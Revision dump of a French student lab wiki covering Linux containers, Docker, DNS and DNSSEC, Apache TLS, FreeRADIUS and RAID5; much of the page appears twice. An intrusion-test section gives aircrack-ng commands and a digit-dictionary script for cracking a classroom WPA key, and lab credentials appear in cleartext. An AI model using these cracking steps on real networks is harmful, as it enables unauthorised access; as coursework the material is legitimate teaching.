ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi (wlp2s0) :<br />
<br />
$ airmon-ng start wlp2s0mon<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=48853TP sysres IMA5sc 2018/2019 G72018-12-17T15:50:04Z<p>Mcreteur : /* 6. Réalisation */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1500px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves<br />
<br />
ZONES INVERSES A FAIRE<br />
<br />
===DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/mods-enabled/eap.conf :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
== 5. Tests d'intrusion ==<br />
===Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi (wlp2s0) :<br />
<br />
$ airmon-ng start wlp2s0mon<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
